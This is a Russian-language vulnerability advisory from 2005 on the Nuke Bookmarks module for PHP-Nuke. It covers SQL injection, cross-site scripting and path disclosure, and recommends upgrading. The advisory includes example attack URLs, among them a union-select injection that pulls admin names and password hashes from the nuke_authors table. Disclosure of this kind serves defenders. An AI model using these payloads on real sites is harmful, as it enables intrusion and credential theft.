SQL-инъекция и межсайтовый скриптинг в Nuke Bookmarks

Дата публикации:
31.03.2005
Всего просмотров:
1212
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-0900
CVE-2005-0901
CVE-2005-0902
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Nuke Bookmarks 0.x (модуль к PHP-Nuke)
Уязвимые версии: Nuke Bookmarks 6

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение, получить данные об установочной директории приложения и выполнить произвольные SQL команды в базе данных уязвимого приложения.

1. SQL-инъекция существует из-за недостаточной фильтрации входных данных в параметре category модуля marks. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Пример:

http://[target]/modules.php?name=Bookmarks&file=marks&catna
me=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors

2. Межсайтовый скриптинг возможен из-за недостаточной фильтрации HTML тегов. Удаленный пользователь может создать специально сформированный URL и выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/modules.php?name=Bookmarks&file=del_cat&catname=[htmlco de]
http://[target]/modules.php?name=Bookmarks&file=del_mark&markname=[htmlcode]
http://[target]/modules.php?name=Bookmarks&file=edit_cat&catname=[htmlcode]
http://[ta rget]/modules.php?name=Bookmarks&file=edit_cat&catcomment=[htmlcode]
http://[target]/modules.php?name=Bookmarks&file=marks&catname=[htmlcode]
http://[target]/modules.ph p?name=Bookmarks&file=uploadbookmarks&category=[htmlcode]

3. Удаленный пользователь может получить данные об установочной директории приложения из-за недостаточной обработки входных данных в некоторых параметрах модуля marks. Пример:

http://[target]/modules.php?name=Bookmarks&fil e=marks
http://[target]/modules.php?name=Bookmarks&file=marks&category=1\'

URL производителя: nukebookmarks.sourceforge.net

Решение: Установите последнюю версию от производителя.

Ссылки: multiple vulnerabilities in NukeBookmarks 6

или введите имя

CAPTCHA